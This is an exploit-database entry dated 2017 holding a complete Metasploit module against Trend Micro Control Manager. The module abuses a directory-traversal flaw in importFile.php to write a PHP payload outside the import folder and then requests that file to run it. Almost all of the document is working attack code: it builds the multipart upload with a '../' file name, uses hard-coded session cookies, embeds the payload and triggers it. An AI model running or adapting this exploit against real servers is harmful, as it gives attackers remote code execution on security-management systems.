Trend Micro Control Manager - ImportFile Directory Traversal RCE Exploit

2017-09-13T00:00:00
ID 1337DAY-ID-28547
Type zdt
Reporter James Fitts
Modified 2017-09-13T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            require 'msf/core'
require 'msf/core/exploit/php_exe'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::FileDropper
    include Msf::Exploit::PhpEXE
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Trend Micro Control Manager importFile Directory Traversal RCE',
            'Description'    => %q{
                This module exploits a directory traversal vulnerability found in Trend Micro
                Control Manager. The vulnerability is triggered when sending a specially crafted
                fileName (containing ../'s) parameter to the importFile.php script. This will allow
                for writing outside of the ImportPolicy directory.
            },
            'Author'         => [ 'james fitts' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'ZDI', '17-060' ],
                    [ 'URL', 'https://success.trendmicro.com/solution/1116624' ]
                ],
            'Payload'    =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'       => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Feb 07 2017'))
 
        register_options(
            [
                OptString.new('TARGETURI', [true, 'The base path to TMCM', '/webapp']),
                OptBool.new('SSL', [ true, 'Use SSL', true]),
                Opt::RPORT(443),
            ], self.class)
    end
 
    def exploit
        require 'securerandom'
 
        uri =    target_uri.path
        uri << '/' if uri[-1,1] != '/'
 
        boundary = SecureRandom.hex
        payload_name = "#{rand_text_alpha(5)}.php"
        print_status("Uploading #{payload_name} to the server...")
 
        cookies =  "ASP_NET_SessionId=55hjl0burcvx21uslfxjbabs; "
        cookies << "wf_cookie_path=%2F; WFINFOR=#{rand_text_alpha(10)}; "
        cookies << "PHPSESSID=fc4o2lg5fpgognc28sjcitugj1; "
        cookies << "wf_CSRF_token=bd52b54ced23d3dc257984f68c39d34b; "
        cookies << "un=a8cad04472597b0c1163743109dad8f1; userID=1; "
        cookies << "LANG=en_US; "
        cookies << "wids=modTmcmCriticalEvents%2CmodTmcmUserThreatDetection%2CmodTmcmAppStatusSrv%2CmodTmcmTopThreats%2CmodTmcmEndpointThreatDetection%2CmodTmcmCompCompliance%2C; "
        cookies << "lastID=65; cname=mainConsole; theme=default; lastTab=-1"
 
        post_body = []
        post_body << "--#{boundary}\r\n"
        post_body << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
        post_body << "importPolicy\r\n"
        post_body << "--#{boundary}\r\n"
        post_body << "Content-Disposition: form-data; name=\"fileSize\"\r\n\r\n"
        post_body << "2097152\r\n"
        post_body << "--#{boundary}\r\n"
        post_body << "Content-Disposition: form-data; name=\"fileName\"\r\n\r\n"
        post_body << "../../../widget_60_2899/repository/db/sqlite/#{payload_name}\r\n"
        post_body << "--#{boundary}\r\n"
        post_body << "Content-Disposition: form-data; name=\"filename\";\r\n"
        post_body << "filename=\"policy.cmpolicy\"\r\n"
        post_body << "Content-Type: application/octet-stream\r\n\r\n"
        post_body << "<?php #{payload.raw} ?>\r\n\r\n"
        post_body << "--#{boundary}--\r\n"
 
        res = send_request_cgi({
            'method'    => 'POST',
            'uri'           =>   normalize_uri("#{uri}", "widget", "repository", "widgetPool", "wp1", "widgetBase", "modTMCM", "inc", "importFile.php"),
            'ctype'     =>   "multipart/form-data; boundary=#{boundary}",
            'data'      =>   post_body.join,
            'headers'   =>   {
                'Cookie'                    =>   cookies,
                'Accept-Encoding'   =>   "gzip;q=1.0,deflate;q=0.6,identity;q=0.3",
                'Connection'            =>   "close",
                'Accept'                    =>   "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                'Accept-Language'   =>   "en-US,en;q=0.5",
            },
        })
 
        if res.body =~ /Import Successfully/
            print_good("#{payload_name} uploaded successfully!")
            print_status("Attempting to execute payload...")
 
            res = send_request_cgi({
                'method'    =>   'GET',
                'uri'           =>   normalize_uri("#{uri}", "widget_60_2899", "repository", "db", "sqlite", "#{payload_name}"),
                'headesr'   =>   {
                    'Cookie'    =>   cookies
                }
            })
 
        else
            print_error("Something went wrong...")
        end
 
    end
end

#  0day.today [2018-04-03]  #